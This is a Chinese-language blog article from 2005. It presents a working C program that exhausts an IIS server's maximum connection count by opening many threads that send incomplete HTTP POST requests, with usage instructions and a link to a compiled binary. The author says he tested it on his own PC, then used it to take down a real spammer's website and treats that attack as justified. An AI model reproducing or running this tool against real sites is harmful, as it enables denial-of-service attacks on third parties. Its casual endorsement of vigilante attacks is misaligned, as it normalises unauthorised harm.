以小搏大——利用IIS最大連接數(shù)實現(xiàn)網(wǎng)站DOS

intruder 2005-12-16

展開全文

以小搏大——利用IIS最大連接數(shù)實現(xiàn)網(wǎng)站DOS

聲明：本程序僅做為技術(shù)交流之用，勿用于非法用途?。?/FONT>

最近買了個空間來玩，各位勿笑，是入門級的虛擬主機(jī)（偶是窮人啊），各種參數(shù)都相當(dāng)?shù)?，特別是IIS連接數(shù)，只有100個（也就是同時支持100個不同的訪問）。

這里就出現(xiàn)問題了。如果我一直對該網(wǎng)站進(jìn)行連接，雖然我是同一個人，但是IIS卻傻乎乎的把每次連接當(dāng)成不同的人，每連接一次就會分配一個session給我，當(dāng)連接超過服務(wù)器設(shè)置的IIS最大連接數(shù)目的時候……呵呵，拒絕服務(wù)就發(fā)生了。

具體的攻擊嘛，我們當(dāng)然是利用程序來完成。思路簡單，就是不斷的向網(wǎng)站發(fā)HTTP請求，直到超過它的最大連接數(shù)。正好機(jī)器上有以前看了shotgun的《HTTP協(xié)議Content Lenth限制漏洞導(dǎo)致拒絕服務(wù)攻擊》寫的測試程序，跟今天的要求很相似，就拿來改改咯。具體代碼如下：

#include "winsock.h"

#include "stdio.h"

#include "string.h"

#include "io.h"

#pragma comment(lib,"ws2_32.lib")

#define BUFLEN 1024

#define MAXThreadCount 10 //設(shè)置最大線程數(shù)

int ThreadCount=0;

struct mydata

{

char *ip;

int port;

};

unsigned int resolve(char *name)

{

struct hostent *he;

unsigned int ip;

if((ip=inet_addr(name))==(-1))

{

if((he=gethostbyname(name))==0)

return 0;

memcpy(&ip,he->h_addr,4);

}

return ip;

}

DWORD WINAPI Dos(LPVOID lpParam )

{

mydata *csdn = (mydata*)lpParam;

struct sockaddr_in server;

server.sin_family = AF_INET;

server.sin_port = htons(csdn->port);

server.sin_addr.s_addr = resolve((char*)csdn->ip);

if(server.sin_addr.s_addr==0)

{

printf("Don‘t find address %s\n",(char*)csdn->ip);

exit(0);

}

int my;

char buf[100]="POST / HTTP/1.1\r\nHost: ";

strcat(buf,(char*)csdn->ip);

strcat(buf," \r\nContent-Length: 10\r\n\r\n");

my=socket(PF_INET,SOCK_STREAM,0);

if(my==INVALID_SOCKET)

{

printf("ERROR");

exit(0);

}

if(connect(my,(struct sockaddr *) & server,sizeof(server))==SOCKET_ERROR)

{

printf("Socket ERROR:%d",GetLastError());

exit(0);

}

if(send(my,buf,strlen(buf),0)==SOCKET_ERROR){printf("ERROR:send fail!");}

ThreadCount--;

return 0;

}

void thread ( char *a1 , char *a2 , char *a3 )

{

static mydata tmp;

tmp.ip = a1;

tmp.port = atoi(a2);

DWORD dwThreadId;

HANDLE hThread;

WSADATA ws;

if (WSAStartup( MAKEWORD(2,2), &ws )!=0)

{

printf(" [-] WSAStartup() error\n");

exit(0);

}

hThread = CreateThread(

NULL, // no security attributes

0, // use default stack size

Dos, // thread function

&tmp, // argument to thread function

0, // use default creation flags

&dwThreadId); // returns the thread identifier

if (hThread == NULL)

printf( "CreateThread failed." );

ThreadCount++;

Sleep(200); //延時，否則CPU會用滿……

CloseHandle(hThread);

}

int main(int argc, char* argv[])

{

int i=0;

if(argc!=4)

{

printf("\n\tIIS MaxConnectionCount DOS by lake2 ,Jul,8,2005\n");

printf("-Usage:\n");

printf("%s \n",argv[0]);

printf("-Example: %s www.target.com 80 300\n",argv[0]);

return 0;

}

printf("Starting DOS.............Ctrl + C break\n");

while( i < atoi(argv[3]) )

{

if( ThreadCount < MAXThreadCount ){ thread(argv[1],argv[2],argv[3]); i++;}

}

while( 1 ){ }

WSACleanup();

return 0;

}

（VS.net 、XP SP1調(diào)試通過。編譯好的程序可以在這里找到：http://www./lake2/program/IISDos.exe）

程序為命令行程序，共有三個參數(shù)，依次為要攻擊的網(wǎng)站域名、端口、連接數(shù)。嗯，測試下效果先。

測試的目標(biāo)是個人電腦，系統(tǒng)為win2000。IIS管理中把最大連接數(shù)設(shè)為200，很快網(wǎng)站就不能訪問了；增大到500，仍然會被當(dāng)；800，還是要被當(dāng)（圖）。測試過程中該電腦正在運行魔獸世界，而且一直正常?？磥砦覀兊某绦蛑皇菍Ω毒W(wǎng)站，不會央及無辜的啊^_^

既然如此，那索性試試IIS連接數(shù)為無限的情況。程序中的連接參數(shù)我填的8000，結(jié)果運行途中我的系統(tǒng)沒有了緩沖區(qū)間，winsock產(chǎn)生10055號錯誤，程序中止。呵呵，看來這種方法還是只能針對使用虛擬空間的中小網(wǎng)站。

好，偶們來實際使用一下。打開郵箱，隨便找封廣告垃圾郵件，訪問那家伙的網(wǎng)站，然后開始攻擊它，對付這種小站連接數(shù)就設(shè)成300就綽綽有余了。呵呵，很快那網(wǎng)站就不工作了（圖），嘿嘿，這可怪不得我，誰叫他發(fā)垃圾郵件在前。好了，測試完畢，通過驗收，就不跟他玩了。